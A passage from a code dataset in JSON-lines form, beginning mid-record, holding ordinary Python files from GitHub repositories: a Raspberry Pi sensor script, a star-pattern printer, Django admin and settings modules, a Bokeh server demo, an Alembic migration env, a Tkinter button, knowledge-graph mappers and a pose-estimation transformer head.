time.sleep(1)\n\n dist2 = distance(TRIG1,ECHO1)\n print (\"Measured Distance from the second 90 degree= %.1f cm\" % dist2)\n time.sleep(1)\n\n dist3 = distance(TRIG2,ECHO2)\n print (\"Measured Distance from the third 90 degree= %.1f cm\" % dist3)\n time.sleep(1)\n\n dist4 = distance(TRIG3,ECHO3)\n print (\"Measured Distance from the fourth 90 degree= %.1f cm\" % dist4)\n time.sleep(1)\n \n water_pres= distance(water_trig,water_echo)\n print (\"water present= %.1f cm\" % water_pres)\n time.sleep(1)\n water_pres=14-water_pres\n print(water_pres)\n if(water_pres==4):\n water=\"water present\"\n elif(water_pres>4):\n water=\"More water\"\n \n elif(water_pres>2 and water_pres<2):\n water=\"Add 1 litre water\"\n else:\n water=\"In need of water\"\n print(water)\n if(dist1<45 or dist2<45 or dist3<45 or dist4<45):\n print(\"Made high\")\n time.sleep(2)\n print(\"Made low\")\n time.sleep(1)\n \n \n \n\n \nGPIO.add_event_detect(17, GPIO.RISING, callback=my_callback) \n \ntry: \n GPIO.wait_for_edge(9, GPIO.FALLING) \n GPIO.cleanup() \n \nexcept KeyboardInterrupt: \n GPIO.cleanup() # clean up GPIO on CTRL+C exit \nGPIO.cleanup() \n","repo_name":"vigneshesan/growthbox","sub_path":"haha.py","file_name":"haha.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42629579831","text":"lines = int(input('请输入行数:'))\r\nlines_nei = int(input('请输入掏空行数:'))\r\ntao = 1\r\nfor top_line in range(1, lines + 1):\r\n # print(type(line),line)\r\n numbers = 2 * top_line - 1\r\n lastNumbers = 2 * lines - 1\r\n spaces = lastNumbers // 2 - (numbers // 2)\r\n for space in range(spaces):\r\n print(' ', end='')\r\n \r\n a = lines - lines_nei\r\n for number in range(1, numbers + 1):\r\n if top_line > a:\r\n #print(tao,((a + 1) * 2 - 1) // 2 + (2 * tao - 1),end='')\r\n if ((a + 1) * 2 - 1) // 2 < number <= ((a + 1) * 2 - 1) // 2 + (2 * tao - 1):\r\n print(' ', end='')\r\n else:\r\n print('*', end='')\r\n else:\r\n print('*', end='')\r\n if top_line > a and tao < lines_nei:\r\n # print('ok')\r\n tao += 1\r\n print('')\r\n if number == lastNumbers:\r\n underNumbers = lastNumbers - 2\r\n underLinesNei = tao-1\r\n #print(underLinesNei)\r\n for under_line in range(1, lines):\r\n spaces = lastNumbers // 2 - (underNumbers // 2)\r\n for space in range(spaces):\r\n print(' ', end='')\r\n #print(underNumbers // 2)\r\n for number in range(underNumbers):\r\n if underLinesNei > 0:\r\n if (underNumbers // 2)-(underLinesNei*2-1)//2-1 < number < (underNumbers // 2)+(underLinesNei*2-1)//2+1:\r\n print(' ', end='')\r\n else:\r\n print('*', end='')\r\n else:\r\n print('*', end='')\r\n print('')\r\n underNumbers -= 2\r\n underLinesNei -= 1\r\n","repo_name":"Luoyuequan/project","sub_path":"中空_小星星.py","file_name":"中空_小星星.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24725364847","text":"from django.contrib import admin\nfrom docfield.modelfields import JSONField\nimport tagging.models as tags\nimport twemoir.models as tm\nfrom twemoir.lib.adminfields.widgets import JsonPairInputs\n\nclass TMTweetHashtagFilter(admin.SimpleListFilter):\n title = u\"Hashtag\"\n parameter_name = 'hashtag'\n def __init__(self, request, params, model, model_admin):\n self.__model__ = model\n self.title = u\"Hashtag (%s)\" % len(list(tags.Tag.objects.usage_for_model(self.__model__)))\n super(TMTweetHashtagFilter, self).__init__(request, params, model, model_admin)\n \n def lookups(self, request, model_admin):\n tags = model_admin.queryset(request).tags()\n return [(str(t.name), u\"#%s%s (%s)\" % (\n t.name[:15],\n len(t.name) > 15 and u\"…\" or u\"\",\n t.items.count())) for t in sorted(tags,\n key=lambda t: t.items.count(), reverse=True)]\n \n def queryset(self, request, queryset):\n tagged = queryset.tagged(self.value())\n return tagged.count() > 0 and tagged or queryset.all()\n\n# class TMTweeterFilter(admin.SimpleListFilter):\n# title = u\"Tweeter\"\n# parameter_name = 'tweeter'\n# def __init__(self, request, params, model, model_admin):\n# import simplejson as json\n# self.__model__ = model\n# self._structs = [json.loads(ts[0])['user_mentions'] \\\n# for ts in TMTweet.objects.filter(\n# tweet_struct__icontains='user_mentions'\n# ).values_list('tweet_struct')]\n# self._screen_names = set(map(\n# lambda u: u['screen_name'], reduce(\n# lambda a, b: a+b, structs)))\n# self.title = u\"Tweeter (%s)\" % len(self._screen_names)\n# super(TMTweeterFilter, self).__init__(request, params, model, model_admin)\n# \n# def lookups(self, request, model_admin):\n# return [(str(t.name), u\"#%s%s (%s)\" % (\n# t.name[:15],\n# len(t.name) > 15 and u\"…\" or u\"\",\n# t.items.count())) for t in sorted(tags,\n# key=lambda t: t.items.count(), reverse=True)]\n# \n# def queryset(self, request, queryset):\n# tagged = queryset.tagged(self.value())\n# return tagged.count() > 0 and tagged or queryset.all()\n\n\n\nclass TMTweetAdmin(admin.ModelAdmin):\n ordering = ('status_id', 'id',)\n list_display = ('status_id','with_hashtags','text','user_id',)\n list_display_links = ('status_id',)\n list_filter = (TMTweetHashtagFilter,)\n \n search_fields = ['status_id','user_id','text','tweet_struct','_tags',]\n \n formfield_overrides = {\n JSONField: { 'widget': JsonPairInputs },\n }\n \n def with_hashtags(self, obj):\n return ', '.join([u\"#%s\" % t.name for t in obj.tags])\n with_hashtags.short_description = \"Hashtags in Tweet\"\n with_hashtags.allow_tags = True\n \n\nadmin.site.register(tm.TMTweet, TMTweetAdmin)\nadmin.site.register(tm.TMStagedTweet)\nadmin.site.register(tm.TMAppKeyset)\nadmin.site.register(tm.TMUserKeyset)","repo_name":"fish2000/django-twemoir","sub_path":"twemoir/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20126506056","text":"import numpy as np\nfrom tornado.ioloop import IOLoop\n\nfrom bokeh.application.handlers import FunctionHandler\nfrom bokeh.application import Application\nfrom bokeh.layouts import column\nfrom bokeh.models import ColumnDataSource, Slider\nfrom bokeh.plotting import figure\nfrom bokeh.server.server import Server\n\nio_loop = IOLoop.current()\n\n\nclass Test:\n def __init__(self):\n x = np.linspace(0, 10, 1000)\n y = np.log(x) * np.sin(x)\n\n source = ColumnDataSource(data=dict(x=x, y=y))\n\n plot = figure()\n plot.line('x', 'y', source=source)\n\n slider = Slider(start=1, end=10, value=1, step=0.1)\n\n def callback(attr, old, new):\n y = np.log(x) * np.sin(x*new)\n source.data = dict(x=x, y=y)\n\n slider.on_change('value', callback)\n\n bokeh_app = Application(FunctionHandler(\n lambda doc: doc.add_root(column(plot))\n ))\n\n bokeh_app.on_server_loaded = lambda x: print(\"Server loaded\")\n bokeh_app.on_session_created = lambda x: print(\"Session created\")\n bokeh_app.on_server_unloaded = lambda x: print(\"Server unloaded\")\n bokeh_app.on_session_destroyed = lambda x: print(\"Session destroyed\")\n\n server = Server({'/': bokeh_app}, io_loop=io_loop)\n server.start()\n server.run_until_shutdown()\n\n\nif __name__ == '__main__':\n Test()","repo_name":"cosmoscope/cosmos-client-qt","sub_path":"cosmos_client_qt/plotters/bokeh/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30306014818","text":"import os\nos.system(\"clear\")\nfrom numpy import loadtxt\nfrom pylab import plot,show\n\nb=loadtxt(\"sunspots.txt\",float)\n\nx1,y1=b[:,0],b[:,1]\nx2,y2=b[0:1000,0],b[0:1000,1]\n\nprint(\"n= \",len(x2))\n\n\nplot(x1,y1)\nshow()\nplot(x2,y2)\n\n\nshow()\n","repo_name":"fiscompunipamplona/tll-mn-sunspot-sebastian408","sub_path":"Clase.py","file_name":"Clase.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19110406892","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __date__ : 2019-03-19 20:23\n# __author__ : \"Zero, by DevOps学院\"\n# __file__ : dev.py\nimport os\nDEBUG = True\nTIME_ZONE = 'Asia/Shanghai'\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, '../adminbackend.db'),\n }\n}\n","repo_name":"ziyilongwang/Adminoms","sub_path":"adminbackend/adminbackend/adminbackend/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"40294463547","text":"from __future__ import with_statement\n\nimport logging\nimport os\nfrom logging.config import fileConfig\n\nfrom alembic import context\nfrom alembic.config import Config\n\nfrom aim.web.configs import AIM_ENV_MODE_KEY\nfrom aim.web.api.db import engine\nfrom aim.web.utils import get_db_url\nfrom aim.web.api.dashboards import models\nfrom aim.web.api.dashboard_apps import models\nfrom aim.web.api.db import Base\n\n# this is the Alembic Config object, which provides\n# access to the values within the .ini file in use.\nconfig = context.config\n\nif os.getenv(AIM_ENV_MODE_KEY, 'prod') != 'prod':\n here = os.path.abspath(os.path.dirname(__file__))\n config = Config(os.path.join(here, 'alembic_dev.ini'))\n\n# Interpret the config file for Python logging.\n# This line sets up loggers basically.\nfileConfig(config.config_file_name)\nlogger = logging.getLogger('alembic.env')\n\n# add your model's MetaData object here\n# for 'autogenerate' support\ntarget_metadata = Base.metadata\n\n# other values from the config, defined by the needs of env.py,\n# can be acquired:\n# my_important_option = config.get_main_option(\"my_important_option\")\n# ... etc.\n\n\ndef run_migrations_offline():\n \"\"\"Run migrations in 'offline' mode.\n\n This configures the context with just a URL\n and not an Engine, though an Engine is acceptable\n here as well. By skipping the Engine creation\n we don't even need a DBAPI to be available.\n\n Calls to context.execute() here emit the given string to the\n script output.\n\n \"\"\"\n context.configure(\n url=get_db_url(), target_metadata=target_metadata, literal_binds=True\n )\n\n with context.begin_transaction():\n context.run_migrations()\n\n\ndef run_migrations_online():\n \"\"\"Run migrations in 'online' mode.\n\n In this scenario we need to create an Engine\n and associate a connection with the context.\n\n \"\"\"\n\n # this callback is used to prevent an auto-migration from being generated\n # when there are no changes to the schema\n # reference: http://alembic.zzzcomputing.com/en/latest/cookbook.html\n def process_revision_directives(context, revision, directives):\n if getattr(config.cmd_opts, 'autogenerate', False):\n script = directives[0]\n if script.upgrade_ops.is_empty():\n directives[:] = []\n logger.info('No changes in schema detected.')\n\n connectable = engine\n\n with connectable.connect() as connection:\n context.configure(\n connection=connection,\n target_metadata=target_metadata,\n process_revision_directives=process_revision_directives\n )\n\n with context.begin_transaction():\n context.run_migrations()\n\n\nif context.is_offline_mode():\n run_migrations_offline()\nelse:\n run_migrations_online()\n","repo_name":"aimhubio/aim","sub_path":"aim/web/migrations/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":4355,"dataset":"github-code","pt":"52"} +{"seq_id":"44536612378","text":"'''\nThe module contains classes and methods for configuring the button widget\n'''\n\nimport tkinter as tk\n\n\nclass Button:\n '''\n The class is used to create and place a button\n '''\n def __init__(self,\n text: str,\n background: str,\n command,\n x: int,\n y: int):\n\n # Creating a button\n self.button = tk.Button(text=text,\n background=background,\n font=(\"'Segoe', 19\"),\n command=command)\n # Button placement\n self.place(x=x, y=y)\n\n def place(self, x: int, y: int):\n '''\n The method places the button\n\n :param str x: vertical position\n :param str y: horizontal position\n '''\n self.button.place(x=x, y=y, width=115, height=79)\n","repo_name":"fomaaq/Desktop-Calculator","sub_path":"src/widgets/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34338628699","text":"from collections import Counter\nfrom enum import Enum, auto\nfrom typing import Union\nfrom urllib.parse import quote\n\nfrom mowgli_etl.model.concept_net_predicates import RELATED_TO\nfrom mowgli_etl.model.kg_edge import KgEdge\nfrom mowgli_etl.model.kg_node import KgNode\nfrom mowgli_etl.pipeline.swow.swow_constants import SWOW_DATASOURCE_ID, SWOW_NAMESPACE\n\n\"\"\" \nUtility methods for mapping SWOW data into MOWGLI CSKG data structures.\n\"\"\"\n\n\nclass SwowResponseType(Enum):\n R1 = auto()\n R2 = auto()\n R3 = auto()\n\n\ndef swow_node_id(word: str) -> str:\n return f\"{SWOW_NAMESPACE}:{quote(word)}\"\n\n\ndef swow_node(*, word: str, response_counts: Counter) -> KgNode:\n \"\"\"\n Create a cskg node from a SWOW cue or response.\n :param word: a SWOW cue or response\n :param response_counts: counts of responses to this word\n \"\"\"\n assert all(k in SwowResponseType.__members__ for k in response_counts.keys())\n return KgNode.legacy(\n datasource=SWOW_DATASOURCE_ID,\n id=swow_node_id(word),\n label=word,\n other={\n \"response_counts\": {\n rt: response_counts[rt] for rt in SwowResponseType.__members__.keys()\n }\n },\n )\n\n\ndef swow_edge(\n *,\n cue: Union[KgNode, str],\n response: Union[KgNode, str],\n cue_response_counts: Counter,\n response_counts: Counter,\n) -> KgEdge:\n \"\"\"\n Create a cskg edge from a SWOW cue, response, and strength value.\n :param cue: cue phrase\n :param response: response to the cue phrase\n :param cue_response_counts: total response counts for the cue\n :param response_counts: counts of this response to the cue\n \"\"\"\n assert all(k in SwowResponseType.__members__ for k in cue_response_counts.keys())\n assert all(k in SwowResponseType.__members__ for k in response_counts.keys())\n strength_r123 = sum(response_counts.values()) / sum(cue_response_counts.values())\n other = {\n \"response_counts\": {\n rt: response_counts[rt] for rt in SwowResponseType.__members__.keys()\n },\n \"response_strengths\": {\n rt: (\n response_counts[rt] / cue_response_counts[rt]\n if cue_response_counts[rt] > 0\n else 0\n )\n for rt in SwowResponseType.__members__.keys()\n },\n }\n return KgEdge.legacy(\n datasource=SWOW_DATASOURCE_ID,\n subject=cue.id if isinstance(cue, KgNode) else swow_node_id(cue),\n object=response.id if isinstance(response, KgNode) else swow_node_id(response),\n predicate=RELATED_TO,\n weight=strength_r123,\n other=other,\n )\n","repo_name":"tetherless-world/mowgli-etl","sub_path":"mowgli_etl/pipeline/swow/swow_mappers.py","file_name":"swow_mappers.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"4324407543","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom pomnet.models.utils.builder import TRANSFORMER\nfrom mmcv.runner.base_module import BaseModule\nfrom mmcv.cnn import (Conv2d, Linear, xavier_init, build_upsample_layer, ConvModule,\n constant_init, normal_init, build_conv_layer, build_norm_layer)\nfrom mmcv.cnn.bricks.transformer import (build_transformer_layer_sequence,\n build_positional_encoding)\n\nfrom mmpose.models import HEADS\nfrom mmpose.models.heads import TopdownHeatmapBaseHead\nfrom mmpose.models.builder import build_loss\nfrom mmpose.core.evaluation import pose_pck_accuracy\nfrom mmpose.core.evaluation.top_down_eval import keypoints_from_heatmaps\nfrom mmpose.models.utils.ops import resize\nfrom pomnet.models.utils import build_transformer\n\n\n@TRANSFORMER.register_module()\nclass Transformer(BaseModule):\n \"\"\"Implements the DETR transformer.\n Following the official DETR implementation, this module copy-paste\n from torch.nn.Transformer with modifications:\n * positional encodings are passed in MultiheadAttention\n * extra LN at the end of encoder is removed\n * decoder returns a stack of activations from all decoding layers\n See `paper: End-to-End Object Detection with Transformers\n `_ for details.\n Args:\n encoder (`mmcv.ConfigDict` | Dict): Config of\n TransformerEncoder. Defaults to None.\n decoder ((`mmcv.ConfigDict` | Dict)): Config of\n TransformerDecoder. Defaults to None\n init_cfg (obj:`mmcv.ConfigDict`): The Config for initialization.\n Defaults to None.\n \"\"\"\n\n def __init__(self, encoder=None, decoder=None, init_cfg=None):\n super(Transformer, self).__init__(init_cfg=init_cfg)\n self.encoder = build_transformer_layer_sequence(encoder)\n self.decoder = build_transformer_layer_sequence(decoder)\n self.embed_dims = self.encoder.embed_dims\n\n def init_weights(self):\n # follow the official DETR to init parameters\n for m in self.modules():\n if hasattr(m, 'weight') and m.weight.dim() > 1:\n xavier_init(m, distribution='uniform')\n self._is_init = True\n\n def forward(self, x, mask, query_embed, pos_embed, mask_query):\n \"\"\"Forward function for `Transformer`.\n Args:\n x (Tensor): Input query with shape [bs, c, h, w] where\n c = embed_dims.\n mask (Tensor): The key_padding_mask used for encoder and decoder,\n with shape [bs, h, w].\n query_embed (Tensor): The query embedding for decoder, with shape\n [num_query, c].\n pos_embed (Tensor): The positional encoding for encoder and\n decoder, with the same shape as `x`.\n Returns:\n tuple[Tensor]: results of decoder containing the following tensor.\n - out_dec: Output from decoder. If return_intermediate_dec \\\n is True output has shape [num_dec_layers, bs,\n num_query, embed_dims], else has shape [1, bs, \\\n num_query, embed_dims].\n - memory: Output results from encoder, with shape \\\n [bs, embed_dims, h, w].\n\n Notes:\n x: query image features with shape [bs, c, h, w]\n mask: mask for x with shape [bs, h, w]\n pos_embed: positional embedding for x with shape [bs, c, h, w]\n query_embed: sample keypoint features with shape [bs, num_query, c]\n mask_query: mask for query_embed with shape [bs, num_query]\n Outputs:\n out_dec: [num_layers, bs, num_query, c]\n memory: [bs, c, h, w]\n\n \"\"\"\n bs, c, h, w = x.shape\n # use `view` instead of `flatten` for dynamically exporting to ONNX\n x = x.view(bs, c, -1).permute(2, 0, 1) # [bs, c, h, w] -> [h*w, bs, c]\n mask = mask.view(bs, -1) # [bs, h, w] -> [bs, h*w]\n pos_embed = pos_embed.view(bs, c, -1).permute(2, 0, 1)\n memory = self.encoder(\n query=x,\n key=None,\n value=None,\n query_pos=pos_embed,\n query_key_padding_mask=mask)\n\n query_embed = query_embed.permute(1, 0, 2) # [bs, num_query, c] -> [num_query, bs, c]\n # target = torch.zeros_like(query_embed)\n # out_dec: [num_layers, num_query, bs, c]\n out_dec = self.decoder(\n query=query_embed,\n key=memory,\n value=memory,\n key_pos=pos_embed,\n # query_pos=query_embed,\n query_key_padding_mask=mask_query,\n key_padding_mask=mask)\n out_dec = out_dec.transpose(1, 2)\n memory = memory.permute(1, 2, 0).reshape(bs, c, h, w)\n return out_dec, memory\n\n\nclass RelationModel(nn.Module):\n \"\"\"\n Generic Matching Network from Lu et al 2018\n Clas Agnostic Counting.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels):\n super(RelationModel, self).__init__()\n\n self.pool = nn.AdaptiveAvgPool2d(1)\n\n self.conv = ConvModule(\n in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1,\n norm_cfg=dict(type='BN', requires_grad=True),\n inplace=True)\n\n def forward(self, pooled_feature_s, feature_q):\n \"\"\"Forward function.\"\"\"\n\n feature_sample = pooled_feature_s.expand_as(feature_q).clone()\n feature = torch.cat((feature_q, feature_sample), dim=1)\n\n feature = self.conv(feature)\n\n return feature\n\n\n@HEADS.register_module()\nclass TransformerHead(TopdownHeatmapBaseHead):\n\n def __init__(self,\n in_channels,\n transformer=None,\n positional_encoding=dict(\n type='SinePositionalEncoding',\n num_feats=128,\n normalize=True),\n num_deconv_layers=3,\n num_deconv_filters=(256, 256, 256),\n num_deconv_kernels=(4, 4, 4),\n extra=None,\n loss_keypoint=None,\n train_cfg=None,\n test_cfg=None):\n # NOTE here use `AnchorFreeHead` instead of `TransformerHead`,\n # since it brings inconvenience when the initialization of\n # `AnchorFreeHead` is called.\n super().__init__()\n\n out_channels = 1\n self.in_channels = in_channels\n self.positional_encoding = build_positional_encoding(\n positional_encoding)\n self.transformer = build_transformer(transformer)\n self.embed_dims = self.transformer.embed_dims\n assert 'num_feats' in positional_encoding\n num_feats = positional_encoding['num_feats']\n assert num_feats * 2 == self.embed_dims, 'embed_dims should' \\\n f' be exactly 2 times of num_feats. Found {self.embed_dims}' \\\n f' and {num_feats}.'\n\n self.relation_model = RelationModel(self.embed_dims * 2, self.embed_dims)\n\n if extra is not None and not isinstance(extra, dict):\n raise TypeError('extra should be dict or None.')\n\n if num_deconv_layers > 0:\n self.deconv_layers = self._make_deconv_layer(\n num_deconv_layers,\n num_deconv_filters,\n num_deconv_kernels,\n )\n elif num_deconv_layers == 0:\n self.deconv_layers = nn.Identity()\n else:\n raise ValueError(\n f'num_deconv_layers ({num_deconv_layers}) should >= 0.')\n\n identity_final_layer = False\n if extra is not None and 'final_conv_kernel' in extra:\n assert extra['final_conv_kernel'] in [0, 1, 3]\n if extra['final_conv_kernel'] == 3:\n padding = 1\n elif extra['final_conv_kernel'] == 1:\n padding = 0\n else:\n # 0 for Identity mapping.\n identity_final_layer = True\n kernel_size = extra['final_conv_kernel']\n else:\n kernel_size = 1\n padding = 0\n\n if identity_final_layer:\n self.final_layer = nn.Identity()\n else:\n assert num_deconv_layers > 0\n conv_channels = num_deconv_filters[\n -1]\n\n layers = []\n if extra is not None:\n num_conv_layers = extra.get('num_conv_layers', 0)\n num_conv_kernels = extra.get('num_conv_kernels',\n [1] * num_conv_layers)\n\n for i in range(num_conv_layers):\n layers.append(\n build_conv_layer(\n dict(type='Conv2d'),\n in_channels=conv_channels,\n out_channels=conv_channels,\n kernel_size=num_conv_kernels[i],\n stride=1,\n padding=(num_conv_kernels[i] - 1) // 2))\n layers.append(\n build_norm_layer(dict(type='BN'), conv_channels)[1])\n layers.append(nn.ReLU(inplace=True))\n\n layers.append(\n build_conv_layer(\n cfg=dict(type='Conv2d'),\n in_channels=conv_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=1,\n padding=padding))\n\n if len(layers) > 1:\n self.final_layer = nn.Sequential(*layers)\n else:\n self.final_layer = layers[0]\n\n self.loss = build_loss(loss_keypoint)\n self.train_cfg = {} if train_cfg is None else train_cfg\n self.test_cfg = {} if test_cfg is None else test_cfg\n self.target_type = self.test_cfg.get('target_type', 'GaussianHeatMap')\n\n self._init_layers()\n\n def _make_deconv_layer(self, num_layers, num_filters, num_kernels):\n \"\"\"Make deconv layers.\"\"\"\n if num_layers != len(num_filters):\n error_msg = f'num_layers({num_layers}) ' \\\n f'!= length of num_filters({len(num_filters)})'\n raise ValueError(error_msg)\n if num_layers != len(num_kernels):\n error_msg = f'num_layers({num_layers}) ' \\\n f'!= length of num_kernels({len(num_kernels)})'\n raise ValueError(error_msg)\n\n deconv_in_channels = self.embed_dims\n\n layers = []\n for i in range(num_layers):\n kernel, padding, output_padding = \\\n self._get_deconv_cfg(num_kernels[i])\n\n planes = num_filters[i]\n layers.append(\n build_upsample_layer(\n dict(type='deconv'),\n in_channels=deconv_in_channels,\n out_channels=planes,\n kernel_size=kernel,\n stride=2,\n padding=padding,\n output_padding=output_padding,\n bias=False))\n layers.append(nn.BatchNorm2d(planes))\n layers.append(nn.ReLU(inplace=True))\n deconv_in_channels = planes\n\n return nn.Sequential(*layers)\n\n def _init_layers(self):\n \"\"\"Initialize layers of the transformer head.\"\"\"\n self.input_proj = Conv2d(\n self.in_channels, self.embed_dims, kernel_size=1)\n self.query_proj = Linear(\n self.in_channels, self.embed_dims)\n\n def init_weights(self):\n \"\"\"Initialize weights of the transformer head.\"\"\"\n # The initialization for transformer is important\n self.transformer.init_weights()\n\n for m in self.relation_model.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001, bias=0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n for _, m in self.deconv_layers.named_modules():\n if isinstance(m, nn.ConvTranspose2d):\n normal_init(m, std=0.001)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n for m in self.final_layer.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001, bias=0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n def forward(self, x, feature_s, target_s, mask_s):\n \"\"\"\"Forward function for a single feature level.\n\n Args:\n x (Tensor): Input feature from backbone's single stage, shape\n [bs, c, h, w].\n\n Returns:\n all_cls_scores (Tensor): Outputs from the classification head,\n shape [nb_dec, bs, num_query, cls_out_channels]. Note\n cls_out_channels should includes background.\n all_bbox_preds (Tensor): Sigmoid outputs from the regression\n head with normalized coordinate format (cx, cy, w, h).\n Shape [nb_dec, bs, num_query, 4].\n \"\"\"\n # construct binary masks which used for the transformer.\n # NOTE following the official DETR repo, non-zero values representing\n # ignored positions, while zero values means valid positions.\n\n # process query image feature\n x = self.input_proj(x)\n masks = x.new_zeros((x.shape[0], x.shape[2], x.shape[3])).to(torch.bool)\n pos_embed = self.positional_encoding(masks) # [bs, embed_dim, h, w]\n\n # process keypoint token feature\n # query_embed: [bs, num_query, c]\n # masks_query: [bs, num_query]\n query_embed_list = []\n for feature, target in zip(feature_s, target_s):\n resized_feature = resize(\n input=feature,\n size=target.shape[-2:],\n mode='bilinear',\n align_corners=False)\n target = target / (target.sum(dim=-1).sum(dim=-1)[:, :, None, None] + 1e-8)\n query_embed = target.flatten(2) @ resized_feature.flatten(2).permute(0, 2, 1)\n query_embed_list.append(query_embed)\n query_embed = torch.mean(torch.stack(query_embed_list, dim=0), 0)\n query_embed = query_embed * mask_s\n query_embed = self.query_proj(query_embed)\n masks_query = (~mask_s.to(torch.bool)).squeeze(-1)\n\n # outs_dec: [nb_dec, bs, num_query, c]\n # memory: [bs, c, h, w]\n outs_dec, memory = self.transformer(x, masks, query_embed,\n pos_embed, masks_query)\n out_dec = outs_dec[-1] # [bs, num_query, c]\n\n heatmaps = []\n for kpt in range(out_dec.shape[1]):\n pooled_feature_s = out_dec[:, kpt].unsqueeze(-1).unsqueeze(-1)\n feature = self.relation_model(pooled_feature_s, memory)\n heatmap = self.deconv_layers(feature)\n heatmap = self.final_layer(heatmap)\n heatmaps.append(heatmap)\n heatmaps = torch.cat(heatmaps, dim=1)\n\n return heatmaps\n\n def get_loss(self, output, target, target_weight):\n \"\"\"Calculate top-down keypoint loss.\n\n Note:\n batch_size: N\n num_keypoints: K\n heatmaps height: H\n heatmaps weight: W\n\n Args:\n output (torch.Tensor[NxKxHxW]): Output heatmaps.\n target (torch.Tensor[NxKxHxW]): Target heatmaps.\n target_weight (torch.Tensor[NxKx1]):\n Weights across different joint types.\n \"\"\"\n\n losses = dict()\n\n assert not isinstance(self.loss, nn.Sequential)\n assert target.dim() == 4 and target_weight.dim() == 3\n losses['mse_loss'] = self.loss(output, target, target_weight)\n\n return losses\n\n def get_accuracy(self, output, target, target_weight):\n \"\"\"Calculate accuracy for top-down keypoint loss.\n\n Note:\n batch_size: N\n num_keypoints: K\n heatmaps height: H\n heatmaps weight: W\n\n Args:\n output (torch.Tensor[NxKxHxW]): Output heatmaps.\n target (torch.Tensor[NxKxHxW]): Target heatmaps.\n target_weight (torch.Tensor[NxKx1]):\n Weights across different joint types.\n \"\"\"\n\n accuracy = dict()\n\n if self.target_type == 'GaussianHeatMap':\n _, avg_acc, _ = pose_pck_accuracy(\n output.detach().cpu().numpy(),\n target.detach().cpu().numpy(),\n target_weight.detach().cpu().numpy().squeeze(-1) > 0,\n thr=0.2)\n accuracy['acc_pose'] = float(avg_acc)\n\n return accuracy\n\n def decode(self, img_metas, output, **kwargs):\n \"\"\"Decode keypoints from heatmaps.\n\n Args:\n img_metas (list(dict)): Information about data augmentation\n By default this includes:\n - \"image_file: path to the image file\n - \"center\": center of the bbox\n - \"scale\": scale of the bbox\n - \"rotation\": rotation of the bbox\n - \"bbox_score\": score of bbox\n output (np.ndarray[N, K, H, W]): model predicted heatmaps.\n \"\"\"\n batch_size = len(img_metas)\n\n if 'bbox_id' or 'query_bbox_id' in img_metas[0]:\n bbox_ids = []\n else:\n bbox_ids = None\n\n c = np.zeros((batch_size, 2), dtype=np.float32)\n s = np.zeros((batch_size, 2), dtype=np.float32)\n image_paths = []\n score = np.ones(batch_size)\n for i in range(batch_size):\n c[i, :] = img_metas[i]['query_center']\n s[i, :] = img_metas[i]['query_scale']\n image_paths.append(img_metas[i]['query_image_file'])\n\n if 'query_bbox_score' in img_metas[i]:\n score[i] = np.array(img_metas[i]['query_bbox_score']).reshape(-1)\n if 'bbox_id' in img_metas[i]:\n bbox_ids.append(img_metas[i]['bbox_id'])\n elif 'query_bbox_id' in img_metas[i]:\n bbox_ids.append(img_metas[i]['query_bbox_id'])\n\n preds, maxvals = keypoints_from_heatmaps(\n output,\n c,\n s,\n unbiased=self.test_cfg.get('unbiased_decoding', False),\n post_process=self.test_cfg.get('post_process', 'default'),\n kernel=self.test_cfg.get('modulate_kernel', 11),\n valid_radius_factor=self.test_cfg.get('valid_radius_factor',\n 0.0546875),\n use_udp=self.test_cfg.get('use_udp', False),\n target_type=self.test_cfg.get('target_type', 'GaussianHeatMap'))\n\n all_preds = np.zeros((batch_size, preds.shape[1], 3), dtype=np.float32)\n all_boxes = np.zeros((batch_size, 6), dtype=np.float32)\n all_preds[:, :, 0:2] = preds[:, :, 0:2]\n all_preds[:, :, 2:3] = maxvals\n all_boxes[:, 0:2] = c[:, 0:2]\n all_boxes[:, 2:4] = s[:, 0:2]\n all_boxes[:, 4] = np.prod(s * 200.0, axis=1)\n all_boxes[:, 5] = score\n\n result = {}\n\n result['preds'] = all_preds\n result['boxes'] = all_boxes\n result['image_paths'] = image_paths\n result['bbox_ids'] = bbox_ids\n\n return result\n","repo_name":"luminxu/Pose-for-Everything","sub_path":"pomnet/models/keypoint_heads/transformer_head.py","file_name":"transformer_head.py","file_ext":"py","file_size_in_byte":19375,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"52"} 